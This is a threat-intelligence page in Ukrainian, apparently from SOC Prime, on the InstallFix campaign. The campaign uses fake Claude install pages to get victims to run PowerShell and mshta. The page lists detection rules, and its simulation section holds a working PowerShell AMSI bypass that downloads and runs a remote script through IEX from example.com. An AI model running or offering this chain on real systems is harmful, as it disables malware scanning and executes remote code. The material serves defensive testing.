SOC Prime Bias: Середній

07 May 2026 15:38 UTC

InstallFix та Код Claude: Як Фальшиві Сторінки Встановлення Призводять до Реальних Компрометацій

Author Photo
SOC Prime Team linkedin icon Стежити
InstallFix та Код Claude: Як Фальшиві Сторінки Встановлення Призводять до Реальних Компрометацій
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Кампанія InstallFix поширює шкідливе програмне забезпечення через підроблені реклами Google, які імітують сторінки встановлення Claude AI. Жертви переконуються в запуску команд PowerShell, які викликають mshta.exe для отримання поліглот-файлу ZIP і HTA, який запускає багатоступеневу, безфайлову інфекційну ланцюжок. Навантаження відключає перевірку SSL і захисти AMSI, завантажує додатковий код з домену команд і управління, специфічного для жертви, і створює стійкість через планувальники задач. Операція націлена на організації з різних галузей і регіонів по всьому світу.

Розслідування

Дослідники відстежили повний шлях виконання від підробленої інсталяційної сторінки через mshta.exe, VBScript, і декілька рівнів закодованого PowerShell. Деобфускація показала, що шкідливе програмне забезпечення генерувало унікальний ідентифікатор для кожної жертви і використовувало його для побудови URL команд і управління, специфічних для хоста. Телеметрія мережі виявила вихідні комунікації до кількох шкідливих доменів та IP-адрес. Хоча кінцевий корисний вантаж не був повністю відновлений, спостережувана поведінка натякала на збирання даних та діяльність з ексфільтрації.

Смекшення

Захисники повинні блокувати доступ до виявлених шкідливих доменів і IP-адрес та обмежувати використання mshta.exe та інших застарілих інструментів скриптів, де це можливо. Кінцеві системи безпеки повинні бути налаштовані на виявлення спроб обійти AMSI та підробки перевірки SSL. Організації повинні також впровадити суворе фільтрування URL для трафіку реклами Google, яка веде до сторінок встановлення програмного забезпечення. Усвідомлення користувачів залишається критичним, особливо щодо ризику виконання команд, скопійованих зі спонсорованих результатів пошуку або неперевірених джерел.

Відповідь

Команди безпеки повинні подавати сповіщення про процеси, в яких mshta.exe запускає cmd.exe, powershell.exe, або інтерпретатори скриптів із підозрілими віддаленими URL. Ці події мають бути корельовані зі створенням планувальників задач та вихідними з’єднаннями з відомою інфраструктурою командування та управління. Якщо активність підтверджена, захисники повинні ізолювати хост, припинити шкідливі процеси та видалити будь-які механізми стійкості, такі як заплановані завдання. Потім повинно бути проведено криміналістичний огляд для ідентифікації залишкових компонентів безфайлового корисного вантажу.

Потік атаки

Виявлення

Підозрілі рядки Powershell (через powershell)

Команда SOC Prime
06 травня 2026

Підозріла поведінка уникнення захисту LOLBAS MSHTA шляхом виявлення пов’язаних команд (через process_creation)

Команда SOC Prime
06 травня 2026

Виклик підозрілих методів .NET з Powershell (через powershell)

Команда SOC Prime
06 травня 2026

Підозріле заплановане завдання (через аудит)

Команда SOC Prime
06 травня 2026

IOCs (HashSha256) для виявлення: InstallFix та Claude Code: Як підроблені сторінки встановлення ведуть до справжніх компромісів

SOC Prime AI Правила
06 травня 2026

IOCs (HashSha1) для виявлення: InstallFix та Claude Code: Як підроблені сторінки встановлення ведуть до справжніх компромісів

SOC Prime AI Правила
06 травня 2026

IOCs (SourceIP) для виявлення: InstallFix та Claude Code: Як підроблені сторінки встановлення ведуть до справжніх компромісів

SOC Prime AI Правила
06 травня 2026

IOCs (DestinationIP) для виявлення: InstallFix та Claude Code: Як підроблені сторінки встановлення ведуть до справжніх компромісів

SOC Prime AI Правила
06 травня 2026

Техніки ухилення від PowerShell в кампанії InstallFix [Windows Powershell]

SOC Prime AI Правила
06 травня 2026

Кампанія InstallFix – Mshta.exe запускає Cmd.exe і PowerShell.exe [Створення процесу Windows]

SOC Prime AI Правила
06 травня 2026

Виконання симуляції

Обов’язкова умова: Перевірка телеметрії та базова лінія повинні бути успішно пройдені.

Аргумент: У цьому розділі детально описано точне виконання техніки супротивника (TTP), розробленої для виклику правила виявлення. Команди та розповідь МАКСИМАЛЬНО точно відображають виявлені TTP з метою генерування точної телеметрії, яка очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильного діагнозу.

  • Хід атаки та команди:
    Атакуючий отримує шкідливий скрипт PowerShell через посилання на spear-phishing (T1566.002), яке завантажує вантаж із скомпрометованого сервера. Щоб уникнути виявлення AMSI, скрипт ін’єкціює рядок AMSI_RESULT_NOT_DETECTED у пам’ять процесу, потім використовує IEX оператор для виконання завантаженого коду. Вся команда кодується Base64 і запускається з -EncodedCommand флагом, що задовольняє всі три рядки вибору в правилі Sigma.

    Крок за кроком:

    1. Завантажте шкідливий вантаж (просту команду PowerShell, яка записує файл).
    2. Ін’єкція маркера обхідки AMSI за допомогою встановлення приватного статичного поля amsiInitFailed.
    3. Виконайте вантаж через IEX.
    4. Запустіть весь ланцюжок за допомогою powershell.exe -EncodedCommand ….
  • Скрипт регресійного тесту:

    # Симуляція атаки PowerShell у стилі InstallFix
    # -------------------------------------------------
    # 1. Визначте шкідливий однорядковий скрипт
    $malicious = @"
    `$bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
                .GetField('amsiInitFailed','NonPublic,Static')
    `$bypass.SetValue(`$null,$true)
    IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
    "@
    
    # 2. Закодуйте скрипт в UTF-16LE, а потім у Base64 (вимога PowerShell)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($malicious)
    $encoded = [Convert]::ToBase64String($bytes)
    
    # 3. Виконайте за допомогою powershell.exe з прапором -EncodedCommand
    $command = "powershell.exe -NoProfile -EncodedCommand $encoded"
    Write-Host "Запуск шкідливого PowerShell..."
    Invoke-Expression $command
  • Команди очищення:

    # Видаліть всі тимчасові файли та припиніть збережені процеси
    Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force
    Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
    Write-Host "Очищення завершено."